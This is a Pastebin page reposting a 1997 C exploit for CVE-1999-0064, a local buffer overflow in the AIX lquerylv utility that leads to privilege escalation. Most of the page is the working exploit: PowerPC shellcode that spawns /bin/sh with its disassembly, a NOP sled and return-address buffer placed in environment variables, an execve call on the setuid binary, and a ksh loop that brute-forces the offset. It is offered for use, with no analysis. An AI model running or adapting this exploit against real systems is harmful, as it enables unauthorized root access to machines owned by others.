API tools faq
paste
Advertisement
FlyFar

AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation - CVE-1999-0064

FlyFar
May 17th, 2024
1,376
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.98 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4.  
  5.  
  6. char prog[100]="/usr/sbin/lquerylv";
  7. char prog2[30]="lquerylv";
  8. extern int execv();
  9.  
  10. char *createvar(char *name,char *value)
  11. {
  12. char *c;
  13. int l;
  14. l=strlen(name)+strlen(value)+4;
  15. if (! (c=malloc(l))) {perror("error allocating");exit(2);};
  16. strcpy(c,name);
  17. strcat(c,"=");
  18. strcat(c,value);
  19. putenv(c);
  20. return c;
  21. }
  22.  
  23. /*The program*/
  24. main(int argc,char **argv,char **env)
  25. {
  26. /*The code*/
  27. unsigned int code[]={
  28. 0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
  29. 0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
  30. 0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
  31. 0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
  32. 0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
  33. 0x7c0903a6 , 0x4e800420, 0x0
  34. };
  35. /* disassembly
  36. 7c0802a6        mfspr   r0,LR
  37. 9421fbb0        stu     SP,-1104(SP) --get stack
  38. 90010458        st      r0,1112(SP)
  39. 3c60f019        cau     r3,r0,0xf019 --CTR
  40. 60632c48        lis     r3,r3,11336  --CTR
  41. 90610440        st      r3,1088(SP)
  42. 3c60d002        cau     r3,r0,0xd002 --TOC
  43. 60634c0c        lis     r3,r3,19468  --TOC
  44. 90610444        st      r3,1092(SP)
  45. 3c602f62        cau     r3,r0,0x2f62 --'/bin/sh\x01'
  46. 6063696e        lis     r3,r3,26990
  47. 90610438        st      r3,1080(SP)
  48. 3c602f73        cau     r3,r0,0x2f73
  49. 60636801        lis     r3,r3,26625
  50. 3863ffff        addi    r3,r3,-1
  51. 9061043c        st      r3,1084(SP) --terminate with 0
  52. 30610438        lis     r3,SP,1080
  53. 7c842278        xor     r4,r4,r4    --argv=NULL
  54. 80410440        lwz     RTOC,1088(SP)
  55. 80010444        lwz     r0,1092(SP) --jump
  56. 7c0903a6        mtspr   CTR,r0
  57. 4e800420        bctr              --jump
  58. */
  59.  
  60. #define MAXBUF 600
  61. unsigned int buf[MAXBUF];
  62. unsigned int frame[MAXBUF];
  63. unsigned int i,nop,mn;
  64. int max;
  65. int QUIET=0;
  66. int dobuf=0;
  67. unsigned int toc;
  68. unsigned int eco;
  69. unsigned int *pt;
  70. char *t;
  71. int ch;
  72. unsigned int reta; /* return address */
  73. int corr=4600;
  74. char *args[4];
  75. char *arg1="-L";
  76. char *newenv[8];
  77. int startwith=0;
  78.  
  79. mn=100;
  80. max=280;
  81.  
  82. if (argc>1)
  83.         corr = atoi(argv[1]);
  84.  
  85. pt=(unsigned *) &execv;
  86. toc=*(pt+1);
  87. eco=*pt;
  88.  
  89. if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
  90. {
  91.         perror("Bad parameters");
  92.         exit(1);
  93. }
  94.  
  95. #define OO 7
  96. *((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
  97. *((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
  98. *((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
  99. *((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
  100. 0x0000ffff);
  101.  
  102. reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
  103.  
  104. for(nop=0;nop<mn;nop++)
  105.  buf[nop]=startwith ? reta : 0x4ffffb82;        /*NOP*/
  106. strcpy((char*)&buf[nop],(char*)&code);
  107. i=nop+strlen( (char*) &code)/4-1;
  108.  
  109. if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
  110.         || !(reta && 0xff000000))
  111. {
  112. perror("Return address has zero");exit(5);
  113. }
  114.  
  115. while(i++<max)
  116.  buf[i]=reta;
  117. buf[i]=0;
  118.  
  119. for(i=0;i<max-1;i++)
  120.  frame[i]=reta;
  121. frame[i]=0;
  122.  
  123. if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
  124.  
  125. /* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
  126. newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
  127. newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
  128. newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
  129. newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
  130.  
  131.  
  132. newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
  133. newenv[5]=NULL;
  134.  
  135. args[0]=prog2;
  136. args[1]=arg1;
  137. args[2]=(char*)&frame[0]; /* Just frame pointers */
  138. puts("Start...");/*Here we go*/
  139. execve(prog,args,newenv);
  140. perror("Error executing execve \n");
  141. /*      Georgi Guninski
  142.         guninski@hotmail.com
  143.         sgg@vmei.acad.bg
  144.         guninski@linux2.vmei.acad.bg
  145.         http://www.geocities.com/ResearchTriangle/1711
  146. */
  147. }
  148. /*
  149. ----------cut here---------
  150. ----------sometimes this helps-----------------
  151. #!/bin/ksh
  152. L=100
  153. O=40
  154. while [ $L -lt 12000 ]
  155. do
  156. echo $L
  157. L=`expr $L + 42`
  158. ./a.out $L
  159. done */
  160.  
  161. // milw0rm.com [1997-05-26]
  162.            
Tags: Exploit CVE Vulnerability AIX Iquerlyv LBO LPE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!